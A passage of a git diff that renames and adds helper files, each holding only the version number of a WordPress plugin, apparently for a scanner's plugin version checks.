b/helpers/wordpress/plugins/elementskit-lite.txt @@ -0,0 +1 @@ +2.8.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt similarity index 100% rename from technologies/wordpress/wordpress-enable-media-replace.txt rename to helpers/wordpress/plugins/enable-media-replace.txt diff --git a/technologies/wordpress/wordpress-envato-elements.txt b/helpers/wordpress/plugins/envato-elements.txt similarity index 100% rename from technologies/wordpress/wordpress-envato-elements.txt rename to helpers/wordpress/plugins/envato-elements.txt diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt new file mode 100644 index 0000000000..d41f08f1f3 --- /dev/null +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -0,0 +1 @@ +5.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt new file mode 100644 index 0000000000..6020dfc232 --- /dev/null +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -0,0 +1 @@ +6.9.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cookie-law-info.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt similarity index 100% rename from technologies/wordpress/wordpress-cookie-law-info.txt rename to helpers/wordpress/plugins/facebook-for-woocommerce.txt diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt b/helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt similarity index 100% rename from technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt rename to helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt diff --git a/technologies/wordpress/wordpress-flamingo.txt b/helpers/wordpress/plugins/flamingo.txt similarity index 100% rename from technologies/wordpress/wordpress-flamingo.txt rename to helpers/wordpress/plugins/flamingo.txt diff --git a/technologies/wordpress/wordpress-fluentform.txt b/helpers/wordpress/plugins/fluentform.txt similarity index 100% rename from technologies/wordpress/wordpress-fluentform.txt rename to helpers/wordpress/plugins/fluentform.txt diff --git a/technologies/wordpress/wordpress-font-awesome.txt b/helpers/wordpress/plugins/font-awesome.txt similarity index 100% rename from technologies/wordpress/wordpress-font-awesome.txt rename to helpers/wordpress/plugins/font-awesome.txt diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.txt b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt similarity index 100% rename from technologies/wordpress/wordpress-force-regenerate-thumbnails.txt rename to helpers/wordpress/plugins/force-regenerate-thumbnails.txt diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt new file mode 100644 index 0000000000..393072c7a6 --- /dev/null +++ b/helpers/wordpress/plugins/formidable.txt @@ -0,0 +1 @@ +5.5.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-forminator.txt b/helpers/wordpress/plugins/forminator.txt similarity index 100% rename from technologies/wordpress/wordpress-forminator.txt rename to helpers/wordpress/plugins/forminator.txt diff --git a/technologies/wordpress/wordpress-ga-google-analytics.txt b/helpers/wordpress/plugins/ga-google-analytics.txt similarity index 100% rename from technologies/wordpress/wordpress-ga-google-analytics.txt rename to helpers/wordpress/plugins/ga-google-analytics.txt diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt new file mode 100644 index 0000000000..573e3c6c16 --- /dev/null +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -0,0 +1 @@ +7.11.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt new file mode 100644 index 0000000000..62f6898c18 --- /dev/null +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -0,0 +1 @@ +8.11.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt new file mode 100644 index 0000000000..45674f16a8 --- /dev/null +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -0,0 +1 @@ +2.3.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt similarity index 100% rename from technologies/wordpress/wordpress-google-site-kit.txt rename to helpers/wordpress/plugins/google-site-kit.txt diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt similarity index 100% rename from technologies/wordpress/wordpress-google-sitemap-generator.txt rename to helpers/wordpress/plugins/google-sitemap-generator.txt diff --git a/technologies/wordpress/wordpress-gtranslate.txt b/helpers/wordpress/plugins/gtranslate.txt similarity index 100% rename from technologies/wordpress/wordpress-gtranslate.txt rename to helpers/wordpress/plugins/gtranslate.txt diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt new file mode 100644 index 0000000000..1f4bff5c62 --- /dev/null +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -0,0 +1 @@ +14.7.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.txt b/helpers/wordpress/plugins/happy-elementor-addons.txt similarity index 100% rename from technologies/wordpress/wordpress-happy-elementor-addons.txt rename to helpers/wordpress/plugins/happy-elementor-addons.txt diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.txt b/helpers/wordpress/plugins/header-and-footer-scripts.txt similarity index 100% rename from technologies/wordpress/wordpress-header-and-footer-scripts.txt rename to helpers/wordpress/plugins/header-and-footer-scripts.txt diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt new file mode 100644 index 0000000000..6dbd15a0b6 --- /dev/null +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -0,0 +1 @@ +1.1.32 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-header-footer-elementor.txt b/helpers/wordpress/plugins/header-footer-elementor.txt similarity index 100% rename from technologies/wordpress/wordpress-header-footer-elementor.txt rename to helpers/wordpress/plugins/header-footer-elementor.txt diff --git a/technologies/wordpress/wordpress-header-footer.txt b/helpers/wordpress/plugins/header-footer.txt similarity index 100% rename from technologies/wordpress/wordpress-header-footer.txt rename to helpers/wordpress/plugins/header-footer.txt diff --git a/technologies/wordpress/wordpress-health-check.txt b/helpers/wordpress/plugins/health-check.txt similarity index 100% rename from technologies/wordpress/wordpress-health-check.txt rename to helpers/wordpress/plugins/health-check.txt diff --git a/technologies/wordpress/wordpress-hello-dolly.txt b/helpers/wordpress/plugins/hello-dolly.txt similarity index 100% rename from technologies/wordpress/wordpress-hello-dolly.txt rename to helpers/wordpress/plugins/hello-dolly.txt diff --git a/helpers/wordpress/plugins/imagify.txt b/helpers/wordpress/plugins/imagify.txt new file mode 100644 index 0000000000..42f7d2336e --- /dev/null +++ b/helpers/wordpress/plugins/imagify.txt @@ -0,0 +1 @@ +2.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-imsanity.txt b/helpers/wordpress/plugins/imsanity.txt similarity index 100% rename from technologies/wordpress/wordpress-imsanity.txt rename to helpers/wordpress/plugins/imsanity.txt diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt new file mode 100644 index 0000000000..b9d2bdfd65 --- /dev/null +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -0,0 +1 @@ +2.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-instagram-feed.txt b/helpers/wordpress/plugins/instagram-feed.txt similarity index 100% rename from technologies/wordpress/wordpress-instagram-feed.txt rename to helpers/wordpress/plugins/instagram-feed.txt diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.txt b/helpers/wordpress/plugins/intuitive-custom-post-order.txt similarity index 100% rename from technologies/wordpress/wordpress-intuitive-custom-post-order.txt rename to helpers/wordpress/plugins/intuitive-custom-post-order.txt diff --git a/technologies/wordpress/wordpress-iwp-client.txt b/helpers/wordpress/plugins/iwp-client.txt similarity index 100% rename from technologies/wordpress/wordpress-iwp-client.txt rename to helpers/wordpress/plugins/iwp-client.txt diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt new file mode 100644 index 0000000000..37b64dadd4 --- /dev/null +++ b/helpers/wordpress/plugins/jetpack.txt @@ -0,0 +1 @@ +11.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt similarity index 100% rename from technologies/wordpress/wordpress-kadence-blocks.txt rename to helpers/wordpress/plugins/kadence-blocks.txt diff --git a/technologies/wordpress/wordpress-kirki.txt b/helpers/wordpress/plugins/kirki.txt similarity index 100% rename from technologies/wordpress/wordpress-kirki.txt rename to helpers/wordpress/plugins/kirki.txt diff --git a/technologies/wordpress/wordpress-leadin.txt b/helpers/wordpress/plugins/leadin.txt similarity index 100% rename from technologies/wordpress/wordpress-leadin.txt rename to helpers/wordpress/plugins/leadin.txt diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt new file mode 100644 index 0000000000..fde7ac6392 --- /dev/null +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -0,0 +1 @@ +2.25.10 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-limit-login-attempts.txt b/helpers/wordpress/plugins/limit-login-attempts.txt similarity index 100% rename from technologies/wordpress/wordpress-limit-login-attempts.txt rename to helpers/wordpress/plugins/limit-login-attempts.txt diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt new file mode 100644 index 0000000000..7d3cdbf0dd --- /dev/null +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -0,0 +1 @@ +5.3.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt similarity index 100% rename from technologies/wordpress/wordpress-loco-translate.txt rename to helpers/wordpress/plugins/loco-translate.txt diff --git a/technologies/wordpress/wordpress-loginizer.txt b/helpers/wordpress/plugins/loginizer.txt similarity index 100% rename from technologies/wordpress/wordpress-loginizer.txt rename to helpers/wordpress/plugins/loginizer.txt diff --git a/technologies/wordpress/wordpress-loginpress.txt b/helpers/wordpress/plugins/loginpress.txt similarity index 100% rename from technologies/wordpress/wordpress-loginpress.txt rename to helpers/wordpress/plugins/loginpress.txt diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt b/helpers/wordpress/plugins/mailchimp-for-woocommerce.txt similarity index 100% rename from technologies/wordpress/wordpress-mailchimp-for-woocommerce.txt rename to helpers/wordpress/plugins/mailchimp-for-woocommerce.txt diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt similarity index 100% rename from technologies/wordpress/wordpress-mailchimp-for-wp.txt rename to helpers/wordpress/plugins/mailchimp-for-wp.txt diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt new file mode 100644 index 0000000000..ef8d7569d6 --- /dev/null +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -0,0 +1 @@ +4.2.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-maintenance.txt b/helpers/wordpress/plugins/maintenance.txt similarity index 100% rename from technologies/wordpress/wordpress-maintenance.txt rename to helpers/wordpress/plugins/maintenance.txt diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt new file mode 100644 index 0000000000..ecedc98d1d --- /dev/null +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -0,0 +1 @@ +4.3.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt similarity index 100% rename from technologies/wordpress/wordpress-malcare-security.txt rename to helpers/wordpress/plugins/malcare-security.txt diff --git a/technologies/wordpress/wordpress-megamenu.txt b/helpers/wordpress/plugins/megamenu.txt similarity index 100% rename from technologies/wordpress/wordpress-megamenu.txt rename to helpers/wordpress/plugins/megamenu.txt diff --git a/technologies/wordpress/wordpress-members.txt b/helpers/wordpress/plugins/members.txt similarity index 100% rename from technologies/wordpress/wordpress-members.txt rename to helpers/wordpress/plugins/members.txt diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt new file mode 100644 index 0000000000..db4dd40c58 --- /dev/null +++ b/helpers/wordpress/plugins/meta-box.txt @@ -0,0 +1 @@ +5.6.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt similarity index 100% rename from technologies/wordpress/wordpress-ml-slider.txt rename to helpers/wordpress/plugins/ml-slider.txt diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt new file mode 100644 index 0000000000..2819b5e4e5 --- /dev/null +++ b/helpers/wordpress/plugins/newsletter.txt @@ -0,0 +1 @@ +7.5.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt similarity index 100% rename from technologies/wordpress/wordpress-nextend-facebook-connect.txt rename to helpers/wordpress/plugins/nextend-facebook-connect.txt diff --git a/technologies/wordpress/wordpress-nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt similarity index 100% rename from technologies/wordpress/wordpress-nextgen-gallery.txt rename to helpers/wordpress/plugins/nextgen-gallery.txt diff --git a/technologies/wordpress/wordpress-ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt similarity index 100% rename from technologies/wordpress/wordpress-ninja-forms.txt rename to helpers/wordpress/plugins/ninja-forms.txt diff --git a/technologies/wordpress/wordpress-ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt similarity index 100% rename from technologies/wordpress/wordpress-ocean-extra.txt rename to helpers/wordpress/plugins/ocean-extra.txt diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.txt b/helpers/wordpress/plugins/official-facebook-pixel.txt similarity index 100% rename from technologies/wordpress/wordpress-official-facebook-pixel.txt rename to helpers/wordpress/plugins/official-facebook-pixel.txt diff --git a/technologies/wordpress/wordpress-one-click-demo-import.txt b/helpers/wordpress/plugins/one-click-demo-import.txt similarity index 100% rename from technologies/wordpress/wordpress-one-click-demo-import.txt rename to helpers/wordpress/plugins/one-click-demo-import.txt diff --git a/technologies/wordpress/wordpress-optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt similarity index 100% rename from technologies/wordpress/wordpress-optinmonster.txt rename to helpers/wordpress/plugins/optinmonster.txt diff --git a/technologies/wordpress/wordpress-password-protected.txt b/helpers/wordpress/plugins/password-protected.txt similarity index 100% rename from technologies/wordpress/wordpress-password-protected.txt rename to helpers/wordpress/plugins/password-protected.txt diff --git a/technologies/wordpress/wordpress-pdf-embedder.txt b/helpers/wordpress/plugins/pdf-embedder.txt similarity index 100% rename from technologies/wordpress/wordpress-pdf-embedder.txt rename to helpers/wordpress/plugins/pdf-embedder.txt diff --git a/technologies/wordpress/wordpress-photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt similarity index 100% rename from technologies/wordpress/wordpress-photo-gallery.txt rename to helpers/wordpress/plugins/photo-gallery.txt diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.txt b/helpers/wordpress/plugins/php-compatibility-checker.txt similarity index 100% rename from technologies/wordpress/wordpress-php-compatibility-checker.txt rename to helpers/wordpress/plugins/php-compatibility-checker.txt diff --git a/technologies/wordpress/wordpress-pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt similarity index 100% rename from technologies/wordpress/wordpress-pixelyoursite.txt rename to helpers/wordpress/plugins/pixelyoursite.txt diff --git a/technologies/wordpress/wordpress-polylang.txt b/helpers/wordpress/plugins/polylang.txt similarity index 100% rename from technologies/wordpress/wordpress-polylang.txt rename to helpers/wordpress/plugins/polylang.txt diff --git a/technologies/wordpress/wordpress-popup-builder.txt b/helpers/wordpress/plugins/popup-builder.txt similarity index 100% rename from technologies/wordpress/wordpress-popup-builder.txt rename to helpers/wordpress/plugins/popup-builder.txt diff --git a/technologies/wordpress/wordpress-popup-maker.txt b/helpers/wordpress/plugins/popup-maker.txt similarity index 100% rename from technologies/wordpress/wordpress-popup-maker.txt rename to helpers/wordpress/plugins/popup-maker.txt diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt new file mode 100644 index 0000000000..fae692e41d --- /dev/null +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -0,0 +1 @@ +2.2.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt similarity index 100% rename from technologies/wordpress/wordpress-post-types-order.txt rename to helpers/wordpress/plugins/post-types-order.txt diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt new file mode 100644 index 0000000000..bd17ab05f9 --- /dev/null +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -0,0 +1 @@ +4.9.44 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt new file mode 100644 index 0000000000..132d9f7707 --- /dev/null +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -0,0 +1 @@ +3.2.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-really-simple-captcha.txt b/helpers/wordpress/plugins/really-simple-captcha.txt similarity index 100% rename from technologies/wordpress/wordpress-really-simple-captcha.txt rename to helpers/wordpress/plugins/really-simple-captcha.txt diff --git a/technologies/wordpress/wordpress-really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt similarity index 100% rename from technologies/wordpress/wordpress-really-simple-ssl.txt rename to helpers/wordpress/plugins/really-simple-ssl.txt diff --git a/helpers/wordpress/plugins/redirection.txt b/helpers/wordpress/plugins/redirection.txt new file mode 100644 index 0000000000..0722778658 --- /dev/null +++ b/helpers/wordpress/plugins/redirection.txt @@ -0,0 +1 @@ +5.3.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt similarity index 100% rename from technologies/wordpress/wordpress-redux-framework.txt rename to helpers/wordpress/plugins/redux-framework.txt diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.txt b/helpers/wordpress/plugins/regenerate-thumbnails.txt similarity index 100% rename from technologies/wordpress/wordpress-regenerate-thumbnails.txt rename to helpers/wordpress/plugins/regenerate-thumbnails.txt diff --git a/technologies/wordpress/wordpress-safe-svg.txt b/helpers/wordpress/plugins/safe-svg.txt similarity index 100% rename from technologies/wordpress/wordpress-safe-svg.txt rename to helpers/wordpress/plugins/safe-svg.txt diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt similarity index 100% rename from technologies/wordpress/wordpress-seo-by-rank-math.txt rename to helpers/wordpress/plugins/seo-by-rank-math.txt diff --git a/technologies/wordpress/wordpress-sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt similarity index 100% rename from technologies/wordpress/wordpress-sg-cachepress.txt rename to helpers/wordpress/plugins/sg-cachepress.txt diff --git a/technologies/wordpress/wordpress-sg-security.txt b/helpers/wordpress/plugins/sg-security.txt similarity index 100% rename from technologies/wordpress/wordpress-sg-security.txt rename to helpers/wordpress/plugins/sg-security.txt diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt similarity index 100% rename from technologies/wordpress/wordpress-shortcodes-ultimate.txt rename to helpers/wordpress/plugins/shortcodes-ultimate.txt diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt similarity index 100% rename from technologies/wordpress/wordpress-shortpixel-image-optimiser.txt rename to helpers/wordpress/plugins/shortpixel-image-optimiser.txt diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.txt b/helpers/wordpress/plugins/simple-custom-post-order.txt similarity index 100% rename from technologies/wordpress/wordpress-simple-custom-post-order.txt rename to helpers/wordpress/plugins/simple-custom-post-order.txt diff --git a/technologies/wordpress/wordpress-simple-page-ordering.txt b/helpers/wordpress/plugins/simple-page-ordering.txt similarity index 100% rename from technologies/wordpress/wordpress-simple-page-ordering.txt rename to helpers/wordpress/plugins/simple-page-ordering.txt diff --git a/technologies/wordpress/wordpress-siteguard.txt b/helpers/wordpress/plugins/siteguard.txt similarity index 100% rename from technologies/wordpress/wordpress-siteguard.txt rename to helpers/wordpress/plugins/siteguard.txt diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.txt b/helpers/wordpress/plugins/siteorigin-panels.txt similarity index 100% rename from technologies/wordpress/wordpress-yith-woocommerce-compare.txt rename to helpers/wordpress/plugins/siteorigin-panels.txt diff --git a/technologies/wordpress/wordpress-smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt similarity index 100% rename from technologies/wordpress/wordpress-smart-slider-3.txt rename to helpers/wordpress/plugins/smart-slider-3.txt diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt new file mode 100644 index 0000000000..b8beb39172 --- /dev/null +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -0,0 +1 @@ +1.45.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt b/helpers/wordpress/plugins/ssl-insecure-content-fixer.txt similarity index 100% rename from technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt rename to helpers/wordpress/plugins/ssl-insecure-content-fixer.txt diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt similarity index 100% rename from technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt rename to helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt diff --git a/helpers/wordpress/plugins/sucuri-scanner.txt b/helpers/wordpress/plugins/sucuri-scanner.txt new file mode 100644 index 0000000000..69dbee440b --- /dev/null +++ b/helpers/wordpress/plugins/sucuri-scanner.txt @@ -0,0 +1 @@ +1.8.36 \ No newline at end of file diff --git a/helpers/wordpress/plugins/svg-support.txt b/helpers/wordpress/plugins/svg-support.txt new file mode 100644 index 0000000000..160fe391c8 --- /dev/null +++ b/helpers/wordpress/plugins/svg-support.txt @@ -0,0 +1 @@ +2.5.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/table-of-contents-plus.txt b/helpers/wordpress/plugins/table-of-contents-plus.txt new file mode 100644 index 0000000000..483d07b5d8 --- /dev/null +++ b/helpers/wordpress/plugins/table-of-contents-plus.txt @@ -0,0 +1 @@ +2212 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-tablepress.txt b/helpers/wordpress/plugins/tablepress.txt similarity index 100% rename from technologies/wordpress/wordpress-tablepress.txt rename to helpers/wordpress/plugins/tablepress.txt diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.txt b/helpers/wordpress/plugins/taxonomy-terms-order.txt similarity index 100% rename from technologies/wordpress/wordpress-taxonomy-terms-order.txt rename to helpers/wordpress/plugins/taxonomy-terms-order.txt diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt new file mode 100644 index 0000000000..3034eb6b75 --- /dev/null +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -0,0 +1 @@ +6.0.6.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-themeisle-companion.txt b/helpers/wordpress/plugins/themeisle-companion.txt similarity index 100% rename from technologies/wordpress/wordpress-themeisle-companion.txt rename to helpers/wordpress/plugins/themeisle-companion.txt diff --git a/technologies/wordpress/wordpress-tinymce-advanced.txt b/helpers/wordpress/plugins/tinymce-advanced.txt similarity index 100% rename from technologies/wordpress/wordpress-tinymce-advanced.txt rename to helpers/wordpress/plugins/tinymce-advanced.txt diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt new file mode 100644 index 0000000000..6550da6970 --- /dev/null +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -0,0 +1 @@ +2.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt new file mode 100644 index 0000000000..7c32728738 --- /dev/null +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -0,0 +1 @@ +2.1.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-under-construction-page.txt b/helpers/wordpress/plugins/under-construction-page.txt similarity index 100% rename from technologies/wordpress/wordpress-under-construction-page.txt rename to helpers/wordpress/plugins/under-construction-page.txt diff --git a/technologies/wordpress/wordpress-unyson.txt b/helpers/wordpress/plugins/unyson.txt similarity index 100% rename from technologies/wordpress/wordpress-unyson.txt rename to helpers/wordpress/plugins/unyson.txt diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt new file mode 100644 index 0000000000..189b0e6a04 --- /dev/null +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -0,0 +1 @@ +1.22.24 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-use-any-font.txt b/helpers/wordpress/plugins/use-any-font.txt similarity index 100% rename from technologies/wordpress/wordpress-use-any-font.txt rename to helpers/wordpress/plugins/use-any-font.txt diff --git a/helpers/wordpress/plugins/user-role-editor.txt b/helpers/wordpress/plugins/user-role-editor.txt new file mode 100644 index 0000000000..d854a3ee51 --- /dev/null +++ b/helpers/wordpress/plugins/user-role-editor.txt @@ -0,0 +1 @@ +4.63.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.txt b/helpers/wordpress/plugins/velvet-blues-update-urls.txt similarity index 100% rename from technologies/wordpress/wordpress-velvet-blues-update-urls.txt rename to helpers/wordpress/plugins/velvet-blues-update-urls.txt diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt new file mode 100644 index 0000000000..72d132f745 --- /dev/null +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -0,0 +1 @@ +2.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt new file mode 100644 index 0000000000..d41f08f1f3 --- /dev/null +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -0,0 +1 @@ +5.5.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.txt b/helpers/wordpress/plugins/widget-importer-exporter.txt similarity index 100% rename from technologies/wordpress/wordpress-widget-importer-exporter.txt rename to helpers/wordpress/plugins/widget-importer-exporter.txt diff --git a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt new file mode 100644 index 0000000000..e54077fef0 --- /dev/null +++ b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt @@ -0,0 +1 @@ +1.2.21 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt new file mode 100644 index 0000000000..b9268dae24 --- /dev/null +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -0,0 +1 @@ +1.8.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.txt b/helpers/wordpress/plugins/woo-variation-swatches.txt similarity index 100% rename from technologies/wordpress/wordpress-woo-variation-swatches.txt rename to helpers/wordpress/plugins/woo-variation-swatches.txt diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt b/helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt similarity index 100% rename from technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt rename to helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt similarity index 100% rename from technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt rename to helpers/wordpress/plugins/woocommerce-gateway-stripe.txt diff --git a/technologies/wordpress/wordpress-woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt similarity index 100% rename from technologies/wordpress/wordpress-woocommerce-payments.txt rename to helpers/wordpress/plugins/woocommerce-payments.txt diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt new file mode 100644 index 0000000000..10bf840ed5 --- /dev/null +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -0,0 +1 @@ +2.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt new file mode 100644 index 0000000000..c4a602db6e --- /dev/null +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -0,0 +1 @@ +3.2.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt similarity index 100% rename from technologies/wordpress/wordpress-woocommerce-services.txt rename to 